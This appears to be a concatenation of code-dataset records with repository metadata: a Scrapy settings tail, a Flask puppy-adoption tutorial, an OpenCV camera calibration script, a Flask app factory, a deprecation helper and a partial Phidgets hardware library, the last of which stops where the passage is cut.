# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'opendv.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'opendv.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'opendv.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"2060713822@qq.com"
] | 2060713822@qq.com |
27e8148639ef3900c658043fd8f3134b0427f2e7 | 47e5ec3519cc913a48604f6974d1ff50512c35ed | /flask_db_view/adoption.py | d2d0b1f26819c55a7044831b98c5029adb76569a | [] | no_license | Tuxaura/flask_example | a3e25a8a6c3a94c3834b7fbaf56a19c7d5273607 | 92a1e374592430d78f72af82323f19550b3644c2 | refs/heads/main | 2023-01-03T23:30:15.785440 | 2020-10-20T03:01:35 | 2020-10-20T03:01:35 | 305,043,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,999 | py | import os
from forms import AddForm, DelForm
from flask import Flask, render_template, url_for, redirect
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
app = Flask(__name__)
app.config['SECRET_KEY'] = 'mysecretkey'
########################################
######## SQLITE DATABASE SECTION #######
########################################
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
Migrate(app, db)
########################################
############### MODELS #################
########################################
class Puppy(db.Model):
__tablename__ = 'puppies'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.Text)
def __init__(self, name):
self.name = name
def __repr__(self):
return f"Puppy name: {self.name}"
########################################
################ VIEW ##################
########################################
@app.route("/")
def index():
return render_template("home.html")
@app.route('/add', methods=['GET', 'POST'])
def add_pup():
form = AddForm()
if form.validate_on_submit():
name = form.name.data
new_pup = Puppy(name)
db.session.add(new_pup)
db.session.commit()
return redirect(url_for('list_pup'))
return render_template('add.html', form=form)
@app.route("/list")
def list_pup():
puppies = Puppy.query.all()
return render_template('list.html', puppies=puppies)
@app.route("/delete")
def del_pup():
form = DelForm()
if form.validate_on_submit():
id = form.id.data
pup = Puppy.query.get(id)
db.session.delete(pup)
db.session.commit()
return redirect(url_for('list_pup'))
return render_template('delete.html', form=form)
if __name__ == '__main__':
app.run(debug=True) | [
"bebenx@gmail.com"
] | bebenx@gmail.com |
1899eab304d24281ff12e625cfc407a5a261e1e3 | 0b9503244be5a9ce6478405c20de33843240e51f | /calibrate.py | 7f9c5963edbd6f762a028d4ec4ec5584947b1080 | [] | no_license | ConnorBurnsCoder/3dObjectReconstruction | 216819a0fedc882938a22e8bab8de72d895c3e83 | 05899167262d74bbb3b87a8d05cd05686828f571 | refs/heads/main | 2023-02-17T07:20:19.711157 | 2021-01-17T02:34:15 | 2021-01-17T02:34:15 | 330,282,689 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,383 | py | #
# To run:
#
# Install opencv modules in Anaconda environment:
#
# conda install opencv
# pip install --upgrade pip
# pip install opencv-contrib-python
#
# Run calibrate.py from the commandline:
#
# python calibrate.py
import pickle
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
# file names, modify as necessary
calibimgfiles = 'calib_jpg_u/*.jpg'
resultfile = 'calibration.pickle'
# checkerboard coordinates in 3D
objp = np.zeros((6*8,3), np.float32)
objp[:,:2] = 2.8*np.mgrid[0:8, 0:6].T.reshape(-1,2)
# arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(calibimgfiles)
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
img = cv2.imread(fname)
img_size = (img.shape[1], img.shape[0])
gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# Find the chessboard corners
ret, corners = cv2.findChessboardCorners(gray, (8,6), None)
# If found, add object points, image points
if ret == True:
objpoints.append(objp)
imgpoints.append(corners)
# Display image with the corners overlayed
cv2.drawChessboardCorners(img, (8,6), corners, ret)
cv2.imshow('img', img)
cv2.waitKey(500)
cv2.destroyAllWindows()
# now perform the calibration
ret, K, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)
print("Estimated camera intrinsic parameter matrix K")
print(K)
print("Estimated radial distortion coefficients")
print(dist)
print("Individual intrinsic parameters")
print("fx = ",K[0][0])
print("fy = ",K[1][1])
print("cx = ",K[0][2])
print("cy = ",K[1][2])
# save the results out to a file for later use
calib = {}
calib["fx"] = K[0][0]
calib["fy"] = K[1][1]
calib["cx"] = K[0][2]
calib["cy"] = K[1][2]
calib["dist"] = dist
fid = open(resultfile, "wb" )
pickle.dump(calib,fid)
fid.close()
#
# optionally go through and remove radial distortion from a set of images
#
#images = glob.glob(calibimgfiles)
#for idx, fname in enumerate(images):
# img = cv2.imread(fname)
# img_size = (img.shape[1], img.shape[0])
#
# dst = cv2.undistort(img, K, dist, None, K)
# udfname = fname+'undistort.jpg'
# cv2.imwrite(udfname,dst)
#
| [
"noreply@github.com"
] | noreply@github.com |
3040eece0cb8864c9e7d39ddab4a66343a0f3988 | 2112e4cfd9568128573098f8e209962002f66a23 | /app.py | 23284a6ccf1befdf6ba398a9fa834d9e7048b7e3 | [] | no_license | amazingguni/stock-trader | 0bd39cce6f6462c9648e3c8b2893b3e8379e37ca | 252c9230885200cfde845f2a03677140564cfc62 | refs/heads/main | 2023-05-05T18:26:04.124690 | 2021-05-30T13:12:58 | 2021-05-30T13:12:58 | 362,616,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | from flask import Flask, Response
from flask_login import LoginManager
from flask_cors import CORS
from config import get_config_by_env
from container import Container
from web.admin import admin
from mongodb import db
login_manager = LoginManager()
def create_app():
app = Flask(__name__, template_folder='./web/templates')
@app.route('/')
# pylint: disable=unused-variable
def index():
return Response(status=200)
app.config.from_object(get_config_by_env())
CORS(app)
login_manager.init_app(app)
container = Container()
app.container = container
from web.admin.views import sync as admin_sync_views
from web.admin.views import stock as admin_stock_views
from web.admin.views import portfolio as admin_portfolio_views
admin_views = [admin_sync_views,
admin_stock_views, admin_portfolio_views, ]
with app.app_context():
container.wire(modules=admin_views)
admin.init_app(app)
db.init_app(app)
return app
def register_blueprints(app, views):
for view in views:
app.register_blueprint(view.bp)
@login_manager.user_loader
def load_user(user_id):
from core.user.domain.user import User
return User.query.filter(User.id == user_id).first()
app = create_app()
| [
"amazingguni@gmail.com"
] | amazingguni@gmail.com |
862e1582b1eea05a10d17fec0afe45b0ba83391c | 17e08f795273d6f4233ab440c2706130f6520b58 | /fannypack/utils/_deprecation.py | 9174fd10a6bbb73f059b87105a1183e6c2716f63 | [
"MIT"
] | permissive | HaoWen470/fannypack | db5e6bb670004e470254e1e632899aeec38ee041 | 7e2c949de0e0cac69a95a5a777f8a4b1fa0fc17a | refs/heads/master | 2023-01-03T20:35:35.248848 | 2020-10-31T09:01:01 | 2020-10-31T09:01:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | import warnings
from typing import Callable
def deprecation_wrapper(message: str, function_or_class: Callable) -> Callable:
"""Creates a wrapper for a deprecated function or class. Prints a warning
the first time a function or class is called.
Args:
message (str): Warning message.
function_or_class (Callable): Function or class to wrap.
Returns:
Callable: Wrapped function/class.
"""
warned = False
def curried(*args, **kwargs): # pragma: no cover
nonlocal warned
if not warned:
warnings.warn(message, DeprecationWarning, stacklevel=2)
warned = True
return function_or_class(*args, **kwargs)
return curried
def new_name_wrapper(
old_name: str, new_name: str, function_or_class: Callable
) -> Callable:
"""Creates a wrapper for a renamed function or class. Prints a warning the first
time a function or class is called with the old name.
Args:
old_name (str): Old name of function or class. Printed in warning.
new_name (str): New name of function or class. Printed in warning.
function_or_class (Callable): Function or class to wrap.
Returns:
Callable: Wrapped function/class.
"""
return deprecation_wrapper(
f"{old_name} is deprecated! Use {new_name} instead.", function_or_class
)
| [
"yibrenth@gmail.com"
] | yibrenth@gmail.com |
6f376d5a004ec5eee4d889f2bc0c73627de267aa | 5e05992e2b92c7aeb98183814ac75e994a8c1be5 | /Python OSC SENSOR RECIEVE/Phidgets/Phidget.py | 294727d138ef110694b5e802f7c587fd00b61b40 | [] | no_license | tijmenvangurp/Glow-festival-code | 2cf383b0d030ea78ad67c40042c0691e016b2dbf | b9e51a8ae74e0353e8a84088e8e01a8b3d6e267c | refs/heads/master | 2021-01-21T02:00:19.470907 | 2015-04-10T08:30:35 | 2015-04-10T08:30:35 | 33,717,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42,346 | py | """
Copyright 2010 Phidgets Inc.
This work is licensed under the Creative Commons Attribution 2.5 Canada License.
To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ca/
"""
from Phidgets import PhidgetException
__author__ = 'Adam Stelmack'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
from Phidgets.Common import prepOutput
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Events.Events import AttachEventArgs, DetachEventArgs, ErrorEventArgs, ServerConnectArgs
import sys
class PhidgetLogLevel:
PHIDGET_LOG_CRITICAL = 1
PHIDGET_LOG_ERROR = 2
PHIDGET_LOG_WARNING = 3
PHIDGET_LOG_DEBUG = 4
PHIDGET_LOG_INFO = 5
PHIDGET_LOG_VERBOSE = 6
class PhidgetClass:
NOTHING = 1
ACCELEROMETER = 2
ADVANCEDSERVO = 3
ANALOG = 22
BRIDGE = 23
ENCODER = 4
FREQUENCYCOUNTER = 21
GPS = 5
INTERFACEKIT = 7
IR = 19
LED = 8
MOTORCONTROL = 9
PHSENSOR = 10
RFID = 11
SERVO = 12
SPATIAL = 20
STEPPER = 13
TEMPERATURESENSOR = 14
TEXTLCD = 15
TEXTLED = 16
WEIGHTSENSOR = 17
@staticmethod
def toString(val):
if val == PhidgetClass.ACCELEROMETER:
return "ACCELEROMETER"
elif val == PhidgetClass.ADVANCEDSERVO:
return "ADVANCEDSERVO"
elif val == PhidgetClass.ANALOG:
return "ANALOG"
elif val == PhidgetClass.BRIDGE:
return "BRIDGE"
elif val == PhidgetClass.ENCODER:
return "ENCODER"
elif val == PhidgetClass.FREQUENCYCOUNTER:
return "FREQUENCYCOUNTER"
elif val == PhidgetClass.GPS:
return "GPS"
elif val == PhidgetClass.INTERFACEKIT:
return "INTERFACEKIT"
elif val == PhidgetClass.IR:
return "IR"
elif val == PhidgetClass.LED:
return "LED"
elif val == PhidgetClass.MOTORCONTROL:
return "MOTORCONTROL"
elif val == PhidgetClass.PHSENSOR:
return "PHSENSOR"
elif val == PhidgetClass.RFID:
return "RFID"
elif val == PhidgetClass.SERVO:
return "SERVO"
elif val == PhidgetClass.SPATIAL:
return "SPATIAL"
elif val == PhidgetClass.STEPPER:
return "STEPPER"
elif val == PhidgetClass.TEMPERATURESENSOR:
return "TEMPERATURESENSOR"
elif val == PhidgetClass.TEXTLCD:
return "TEXTLCD"
elif val == PhidgetClass.TEXTLED:
return "TEXTLED"
elif val == PhidgetClass.WEIGHTSENSOR:
return "WEIGHTSENSOR"
else:
return "NOTHING"
class PhidgetID:
# These are all current devices
PHIDID_ACCELEROMETER_3AXIS = 0x07E #< Phidget 3-axis Accelerometer (1059)
PHIDID_ADVANCEDSERVO_1MOTOR = 0x082 #< Phidget 1 Motor Advanced Servo (1066)
PHIDID_ADVANCEDSERVO_8MOTOR = 0x03A #< Phidget 8 Motor Advanced Servo (1061)
PHIDID_ANALOG_4OUTPUT = 0x037 #< Phidget Analog 4-output (1002)
PHIDID_BIPOLAR_STEPPER_1MOTOR = 0x07B #< Phidget 1 Motor Bipolar Stepper Controller with 4 Digital Inputs (1063)
PHIDID_BRIDGE_4INPUT = 0x03B #< Phidget Bridge 4-input (1046)
PHIDID_ENCODER_1ENCODER_1INPUT = 0x04B #< Phidget Encoder - Mechanical (1052)
PHIDID_ENCODER_HS_1ENCODER = 0x080 #< Phidget High Speed Encoder (1057)
PHIDID_ENCODER_HS_4ENCODER_4INPUT = 0x04F #< Phidget High Speed Encoder - 4 Encoder (1047)
PHIDID_FREQUENCYCOUNTER_2INPUT = 0x035 #< Phidget Frequency Counter 2-input (1054)
PHIDID_GPS = 0x079 #< Phidget GPS (1040)
PHIDID_INTERFACEKIT_0_0_4 = 0x040 #< Phidget Interface Kit 0/0/4 (1014)
PHIDID_INTERFACEKIT_0_0_8 = 0x081 #< Phidget Interface Kit 0/0/8 (1017)
PHIDID_INTERFACEKIT_0_16_16 = 0x044 #< Phidget Interface Kit 0/16/16 (1012)
PHIDID_INTERFACEKIT_2_2_2 = 0x036 #< Phidget Interface Kit 2/2/2 (1011)
PHIDID_INTERFACEKIT_8_8_8 = 0x045 #< Phidget Interface Kit 8/8/8 (1013, 1018, 1019)
PHIDID_INTERFACEKIT_8_8_8_w_LCD = 0x07D #< Phidget Interface Kit 8/8/8 with TextLCD (1201, 1202, 1203)
PHIDID_IR = 0x04D #< Phidget IR Receiver Transmitter (1055)
PHIDID_LED_64_ADV = 0x04C #< Phidget LED 64 Advanced (1031)
PHIDID_LINEAR_TOUCH = 0x076 #< Phidget Linear Touch (1015)
PHIDID_MOTORCONTROL_1MOTOR = 0x03E #< Phidget 1 Motor Motor Controller (1065)
PHIDID_MOTORCONTROL_HC_2MOTOR = 0x059 #< Phidget 2 Motor High Current Motor Controller (1064)
PHIDID_RFID_2OUTPUT = 0x031 #< Phidget RFID with Digital Outputs and Onboard LED (1023)
PHIDID_ROTARY_TOUCH = 0x077 #< Phidget Rotary Touch (1016)
PHIDID_SPATIAL_ACCEL_3AXIS = 0x07F #< Phidget Spatial 3-axis accel (1049)
PHIDID_SPATIAL_ACCEL_GYRO_COMPASS = 0x033 #< Phidget Spatial 3/3/3 (1056)
PHIDID_TEMPERATURESENSOR = 0x070 #< Phidget Temperature Sensor (1051)
PHIDID_TEMPERATURESENSOR_4 = 0x032 #< Phidget Temperature Sensor 4-input (1048)
PHIDID_TEMPERATURESENSOR_IR = 0x03C #< Phidget Temperature Sensor IR (1045)
PHIDID_TEXTLCD_2x20_w_8_8_8 = 0x17D #< Phidget TextLCD with Interface Kit 8/8/8 (1201, 1202, 1203)
PHIDID_TEXTLCD_ADAPTER = 0x03D #< Phidget TextLCD Adapter (1204)
PHIDID_UNIPOLAR_STEPPER_4MOTOR = 0x07A #< Phidget 4 Motor Unipolar Stepper Controller (1062)
# These are all past devices (no longer sold)
PHIDID_ACCELEROMETER_2AXIS = 0x071 #< Phidget 2-axis Accelerometer (1053, 1054)
PHIDID_INTERFACEKIT_0_8_8_w_LCD = 0x053 #< Phidget Interface Kit 0/8/8 with TextLCD (1219, 1220, 1221)
PHIDID_INTERFACEKIT_4_8_8 = 4 #< Phidget Interface Kit 4/8/8
PHIDID_LED_64 = 0x04A #< Phidget LED 64 (1030)
PHIDID_MOTORCONTROL_LV_2MOTOR_4INPUT = 0x058 #< Phidget 2 Motor Low Voltage Motor Controller with 4 Digital Inputs (1060)
PHIDID_PHSENSOR = 0x074 #< Phidget PH Sensor (1058)
PHIDID_RFID = 0x030 #< Phidget RFID without Digital Outputs
PHIDID_SERVO_1MOTOR = 0x039 #< Phidget 1 Motor Servo Controller (1000)
PHIDID_SERVO_1MOTOR_OLD = 2 #< Phidget 1 Motor Servo Controller - Old Version
PHIDID_SERVO_4MOTOR = 0x038 #< Phidget 4 Motor Servo Controller (1001)
PHIDID_SERVO_4MOTOR_OLD = 3 #< Phidget 4 Motor Servo Controller - Old Version
PHIDID_TEXTLCD_2x20 = 0x052 #< Phidget TextLCD without Interface Kit (1210)
PHIDID_TEXTLCD_2x20_w_0_8_8 = 0x153 #< Phidget TextLCD with Interface Kit 0/8/8 (1219, 1220, 1221)
PHIDID_TEXTLED_1x8 = 0x049 #< Phidget TextLED 1x8
PHIDID_TEXTLED_4x8 = 0x048 #< Phidget TextLED 4x8 (1040)
PHIDID_WEIGHTSENSOR = 0x072 #< Phidget Weight Sensor (1050)
@staticmethod
def toString(val):
if val == PhidgetID.PHIDID_ACCELEROMETER_3AXIS:
return "PHIDID_ACCELEROMETER_3AXIS"
elif val == PhidgetID.PHIDID_ADVANCEDSERVO_1MOTOR:
return "PHIDID_ADVANCEDSERVO_1MOTOR"
elif val == PhidgetID.PHIDID_ADVANCEDSERVO_8MOTOR:
return "PHIDID_ADVANCEDSERVO_8MOTOR"
elif val == PhidgetID.PHIDID_ANALOG_4OUTPUT:
return "PHIDID_ANALOG_4OUTPUT"
elif val == PhidgetID.PHIDID_BIPOLAR_STEPPER_1MOTOR:
return "PHIDID_BIPOLAR_STEPPER_1MOTOR"
elif val == PhidgetID.PHIDID_BRIDGE_4INPUT:
return "PHIDID_BRIDGE_4INPUT"
elif val == PhidgetID.PHIDID_ENCODER_1ENCODER_1INPUT:
return "PHIDID_ENCODER_1ENCODER_1INPUT"
elif val == PhidgetID.PHIDID_ENCODER_HS_1ENCODER:
return "PHIDID_ENCODER_HS_1ENCODER"
elif val == PhidgetID.PHIDID_ENCODER_HS_4ENCODER_4INPUT:
return "PHIDID_ENCODER_HS_4ENCODER_4INPUT"
elif val == PhidgetID.PHIDID_FREQUENCYCOUNTER_2INPUT:
return "PHIDID_FREQUENCYCOUNTER_2INPUT"
elif val == PhidgetID.PHIDID_GPS:
return "PHIDID_GPS"
elif val == PhidgetID.PHIDID_INTERFACEKIT_0_0_4:
return "PHIDID_INTERFACEKIT_0_0_4"
elif val == PhidgetID.PHIDID_INTERFACEKIT_0_0_8:
return "PHIDID_INTERFACEKIT_0_0_8"
elif val == PhidgetID.PHIDID_INTERFACEKIT_0_16_16:
return "PHIDID_INTERFACEKIT_0_16_16"
elif val == PhidgetID.PHIDID_INTERFACEKIT_2_2_2:
return "PHIDID_INTERFACEKIT_2_2_2"
elif val == PhidgetID.PHIDID_INTERFACEKIT_8_8_8:
return "PHIDID_INTERFACEKIT_8_8_8"
elif val == PhidgetID.PHIDID_INTERFACEKIT_8_8_8_w_LCD:
return "PHIDID_INTERFACEKIT_8_8_8_w_LCD"
elif val == PhidgetID.PHIDID_IR:
return "PHIDID_IR"
elif val == PhidgetID.PHIDID_LED_64_ADV:
return "PHIDID_LED_64_ADV"
elif val == PhidgetID.PHIDID_LINEAR_TOUCH:
return "PHIDID_LINEAR_TOUCH"
elif val == PhidgetID.PHIDID_MOTORCONTROL_1MOTOR:
return "PHIDID_MOTORCONTROL_1MOTOR"
elif val == PhidgetID.PHIDID_MOTORCONTROL_HC_2MOTOR:
return "PHIDID_MOTORCONTROL_HC_2MOTOR"
elif val == PhidgetID.PHIDID_RFID_2OUTPUT:
return "PHIDID_RFID_2OUTPUT"
elif val == PhidgetID.PHIDID_ROTARY_TOUCH:
return "PHIDID_ROTARY_TOUCH"
elif val == PhidgetID.PHIDID_SPATIAL_ACCEL_3AXIS:
return "PHIDID_SPATIAL_ACCEL_3AXIS"
elif val == PhidgetID.PHIDID_SPATIAL_ACCEL_GYRO_COMPASS:
return "PHIDID_SPATIAL_ACCEL_GYRO_COMPASS"
elif val == PhidgetID.PHIDID_TEMPERATURESENSOR:
return "PHIDID_TEMPERATURESENSOR"
elif val == PhidgetID.PHIDID_TEMPERATURESENSOR_4:
return "PHIDID_TEMPERATURESENSOR_4"
elif val == PhidgetID.PHIDID_TEMPERATURESENSOR_IR:
return "PHIDID_TEMPERATURESENSOR_IR"
elif val == PhidgetID.PHIDID_TEXTLCD_2x20_w_8_8_8:
return "PHIDID_TEXTLCD_2x20_w_8_8_8"
elif val == PhidgetID.PHIDID_TEXTLCD_ADAPTER:
return "PHIDID_TEXTLCD_ADAPTER"
elif val == PhidgetID.PHIDID_UNIPOLAR_STEPPER_4MOTOR:
return "PHIDID_UNIPOLAR_STEPPER_4MOTOR"
elif val == PhidgetID.PHIDID_ACCELEROMETER_2AXIS:
return "PHIDID_ACCELEROMETER_2AXIS"
elif val == PhidgetID.PHIDID_INTERFACEKIT_0_8_8_w_LCD:
return "PHIDID_INTERFACEKIT_0_8_8_w_LCD"
elif val == PhidgetID.PHIDID_INTERFACEKIT_4_8_8:
return "PHIDID_INTERFACEKIT_4_8_8"
elif val == PhidgetID.PHIDID_LED_64:
return "PHIDID_LED_64"
elif val == PhidgetID.PHIDID_MOTORCONTROL_LV_2MOTOR_4INPUT:
return "PHIDID_MOTORCONTROL_LV_2MOTOR_4INPUT"
elif val == PhidgetID.PHIDID_PHSENSOR:
return "PHIDID_PHSENSOR"
elif val == PhidgetID.PHIDID_RFID:
return "PHIDID_RFID"
elif val == PhidgetID.PHIDID_SERVO_1MOTOR:
return "PHIDID_SERVO_1MOTOR"
elif val == PhidgetID.PHIDID_SERVO_1MOTOR_OLD:
return "PHIDID_SERVO_1MOTOR_OLD"
elif val == PhidgetID.PHIDID_SERVO_4MOTOR:
return "PHIDID_SERVO_4MOTOR"
elif val == PhidgetID.PHIDID_SERVO_4MOTOR_OLD:
return "PHIDID_SERVO_4MOTOR_OLD"
elif val == PhidgetID.PHIDID_TEXTLCD_2x20:
return "PHIDID_TEXTLCD_2x20"
elif val == PhidgetID.PHIDID_TEXTLCD_2x20_w_0_8_8:
return "PHIDID_TEXTLCD_2x20_w_0_8_8"
elif val == PhidgetID.PHIDID_TEXTLED_1x8:
return "PHIDID_TEXTLED_1x8"
elif val == PhidgetID.PHIDID_TEXTLED_4x8:
return "PHIDID_TEXTLED_4x8"
elif val == PhidgetID.PHIDID_WEIGHTSENSOR:
return "PHIDID_WEIGHTSENSOR"
else:
return "NOTHING"
class Phidget:
"""This is the base class from which all Phidget device classes derive."""
def __init__(self):
"""Default Class constructor.
This constructor is to be used only by subclasses, as the Phidget calss should never need to be instatiated directly by the user.
"""
self.handle = c_void_p()
self.__attach = None
self.__detach = None
self.__error = None
self.__serverConnect = None
self.__serverDisconnect = None
self.__onAttach = None
self.__onDetach = None
self.__onError = None
self.__onServerConnect = None
self.__onServerDisconnect = None
if sys.platform == 'win32':
self.__ATTACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
self.__DETACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
self.__ERRORHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_char_p)
self.__SERVERATTACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
self.__SERVERDETACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
elif sys.platform == 'darwin' or sys.platform == 'linux2':
self.__ATTACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
self.__DETACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
self.__ERRORHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_char_p)
self.__SERVERATTACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
self.__SERVERDETACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
@staticmethod
def dispose(self):
try:
result = PhidgetLibrary.getDll().CPhidget_delete(self.handle)
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
self.handle = None
def closePhidget(self):
"""Closes this Phidget.
This will shut down all threads dealing with this Phidget and you won't recieve any more events.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
try:
result = PhidgetLibrary.getDll().CPhidget_close(self.handle)
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def openPhidget(self, serial=-1):
"""Open a Phidget with or without a serial number.
Open is pervasive. What this means is that you can call open on a device before it is plugged in, and keep the device opened across device dis- and re-connections.
Open is Asynchronous. What this means is that open will return immediately -- before the device being opened is actually available,
so you need to use either the attach event or the waitForAttachment method to determine if a device is available before using it.
If no arguement is provided, the first available Phidget will be opened. If there are two Phidgets of the same type attached to the system,
you should specify a serial number, as there is no guarantee which Phidget will be selected by the call to open().
The serial number is a unique number assigned to each Phidget during production and can be used to uniquely identify specific phidgets.
Parameters:
serial<int>: The serial number of the device
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_open(self.handle, c_int(serial))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def openRemote(self, serverID, serial=-1, password=""):
"""Open this Phidget remotely using a Server ID, securely providing a password, and whether or not to connect to a specific serial number.
Providing a password will open the connection securely depending on if a password is set on the host machine's webservice.
If no serial number is provided, the first available Phidget will be opened. If there are two Phidgets of the same type attached to the system,
you should specify a serial number, as there is no guarantee which Phidget will be selected by the call to open().
Parameters:
serverID<string>: ServerID of the Phidget Webservice
serial<int>: The serial number of the device
password<string>: The secure password for the Phidget Webservice
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if the Phidget Webservice cannot be contacted
"""
if not isinstance(serial, int):
if password == "":
password = serial
serial = -1
else:
raise TypeError("inappropriate arguement type: serial %s" % (type(serial)))
try:
result = PhidgetLibrary.getDll().CPhidget_openRemote(self.handle, c_int(serial), c_char_p(serverID), c_char_p(password))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def openRemoteIP(self, IPAddress, port, serial=-1, password=""):
"""Open this Phidget remotely using an IP Address, securely providing a password,and whether or not to connect to a specific serial number.
Providing a password will open the connection securely depending on if a password is set on the host machine's webservice.
If no serial number is provided, the first available Phidget will be opened. If there are two Phidgets of the same type attached to the system,
you should specify a serial number, as there is no guarantee which Phidget will be selected by the call to open().
Parameters:
IPAddress<string>: IP Address or hostname of the Phidget Webservice
port<int>: Port of the Phidget Webservice
serial<int>: The serial number of the device
password<string>: The secure password for the Phidget Webservice
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if the Phidget Webservice cannot be contacted
"""
if not isinstance(serial, int):
if password == "":
password = serial
serial = -1
else:
raise TypeError("inappropriate arguement type: serial %s" % (type(serial)))
try:
result = PhidgetLibrary.getDll().CPhidget_openRemoteIP(self.handle, c_int(serial), c_char_p(IPAddress), c_int(port), c_char_p(password))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getDeviceLabel(self):
"""Gets the label associated with this Phidget.
This label is a String - up to ten digits - that is stored in the Flash memory of newer Phidgets.
This label can be set programatically (see setDeviceLabel), and is non-volatile - so it is remembered even if the Phidget is unplugged.
Returns:
The label associated with this Phidget <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if this Phidget does not support labels.
"""
label = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceLabel(self.handle, byref(label))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(label)
def getDeviceName(self):
"""Return the name of this Phidget.
This is a string that describes the device. For example, a PhidgetInterfaceKit
could be described as "Phidget InterfaceKit 8/8/8", or "Phidget InterfaceKit 0/0/4", among others, depending on the specific device.
This lets you determine the specific type of a Phidget, within the broader classes of Phidgets, such as PhidgetInterfaceKit, or PhidgetServo.
Returns:
The name of the device <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this phidget is not opened or attached.
"""
ptr = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceName(self.handle, byref(ptr))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(ptr)
def getDeviceType(self):
"""Return the device type of this Phidget.
This is a string that describes the device as a class of devices. For example, all PhidgetInterfaceKit Phidgets
will returns the String "PhidgetInterfaceKit".
Returns:
The Device Type <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
ptr = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceType(self.handle, byref(ptr))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(ptr)
def getDeviceClass(self):
"""Gets the class of this Phidget.
Classes represent a group of Phidgets that use the same API type.
Returns:
The Device Class number<int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
classNum = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceClass(self.handle, byref(classNum))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return classNum.value
def getDeviceID(self):
"""Gets the ID of this Phidget.
This ID specifies a specific Phidget device, within the phidget class.
Returns:
The Device ID <int>.
